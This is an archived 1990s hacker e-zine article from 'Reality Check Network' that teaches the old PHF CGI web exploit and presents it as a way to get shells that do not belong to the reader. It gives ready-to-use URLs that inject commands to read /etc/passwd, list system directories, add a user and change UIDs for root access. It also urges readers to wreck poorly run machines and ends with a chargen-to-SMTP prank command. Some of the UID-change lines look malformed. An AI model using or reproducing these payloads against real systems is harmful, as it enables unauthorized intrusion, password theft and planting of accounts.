home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / network / phf.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  6.1 KB  |  81 lines

  1. ª       R  E  A  L  I  T  Y     C  H  E  C  K     N  E  T  W  O  R  K!       ª_
  2. +----------------------------------------------------------------------------ª_
  3. ª                                         ª    
  4. ª         From Issue #33 - PHF Web Hacking                                   ª 
  5. ª         by Dagashi                                                         ª 
  6. ª____________________________________________________________________________ª_
  7. ª____________________________________________________________________________ª_
  8. +----------------------------------------------------------------------------ª_
  9. ª                                                                            ª_
  10. ª      Alright there kiddies, it's time to lightly dive into the world of    ª_
  11. ª  how to obtain shells that do not rightfully belong to you and how to      ª_
  12. ª  generally piss off people on the Internet.  As always, this is a well     ª_
  13. ª  known bit on information (because no one in their right mind would give   ª_
  14. ª  you an exploit to a system that no one else knows of), so I take no       ª_
  15. ª  responsibility for whatever you do with it.                               ª_
  16. ª                                                                            ª_
  17. ª      Since the majority of computers on the Internet are of UNIX decent,   ª_
  18. ª  I will be mainly talk about their problems and such.  Now, the majority   ª_
  19. ª  of us know that UNIX is full of holes and other problems no matter what   ª_
  20. ª  revisions and patches are made, so this might not come as a big surprise  ª
  21. ª  when I tell you there is a common exploit that will run any program on    ª
  22. ª  your victim machine.  It is the PHF hack.  Though it is no big deal to    ª
  23. ª  the majority of ISP's, most little companies do not have the time or      ª
  24. ª  money to deal with all the problems of their operating systems.  Small    ª
  25. ª  schools that are NOT technologically oriented, like high schools with     ª
  26. ª  T1's and such would be a good example.  And so, this will work on some    ª
  27. ª  of them.                                                                  ª
  28. ª                                                                            ª
  29. ª      All that is required to be done is to put this into the URL of        ª
  30. ª  Netscape:                                                                 ª
  31. ª                                                                            ª
  32. ª      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd    ª
  33. ª                                                                            ª
  34. ª      and you have a listing of the passwd file to use or abuse.  But the   ª
  35. ª  PHF exploit can do more then just that (for those of you who will be      ª
  36. ª  flaming me for writing such a simple article).  It can access any type    ª
  37. ª  of program that is on the opposing computer and run it.                   ª
  38. ª                                                                            ª
  39. ª      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/               ª
  40. ª                                                                            ª
  41. ª      will give you the directory listing of everything from the root of    ª
  42. ª  the system.  From there, you can just alter it accordingly to have a      ª
  43. ª  peek around the system to see what else you can learn.                    ª
  44. ª                                                                            ª
  45. ª      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin            ª
  46. ª                                                                            ª
  47. ª      would show you every command that is available in the bin dir.  If    ª
  48. ª  you slightly modified it, you would also be able to see the permissions   ª
  49. ª  of the specific files.                                                    ª
  50. ª                                                                            ª
  51. ª      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin      ª
  52. ª                                                                            ª
  53. ª      which can come in handy since, well, seeing as how you have root      ª
  54. ª  permissions you now have a nice little bit of information about how the   ª
  55. ª  system functions can use that to get even more access or information out  ª
  56. ª  of it.                                                                    ª
  57. ª                                                                            ª
  58. ª      Or the best one of them all:                                          ª
  59. ª                                                                            ª
  60. ª      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20dagashi    ª
  61. ª  %20dagashi%20100%20                                                       ª
  62. ª                                                                            ª
  63. ª      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20dagashi%0    ª
  64. ª                                                                            ª
  65. ª      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500     ª
  66. ª                                                                            ª
  67. ª      Do that and you MIGHT have root access to the server by telnet.  Be   ª
  68. ª  forewarned that this is an old hack and many servers would not have the   ª
  69. ª  PHF script still running or have chmoded it to 000.  This can get you     ª
  70. ª  into a bunch of trouble, so be careful.  As I said before, this is well   ª
  71. ª  known and I wouldn't give it out to you unless most system                ª
  72. ª  administrators (if they deserve the title then they know this hack by     ª
  73. ª  heart) knew it as well.  But there are always those that don't deserve    ª
  74. ª  the honor of the name, and to those, you have my full consent to fuck up  ª
  75. ª  their machines to hell.                                                   ª
  76. ª                                                                            ª
  77. ª      For fun and excitement, type "telnet 127.0.0.1 19 | telnet 127.0.0.1  ª
  78. ª  25" in Linux and watch life become a ball.                                ª
  79. ª                                                                            ª
  80. +----------------------------------------------------------------------------+
  81.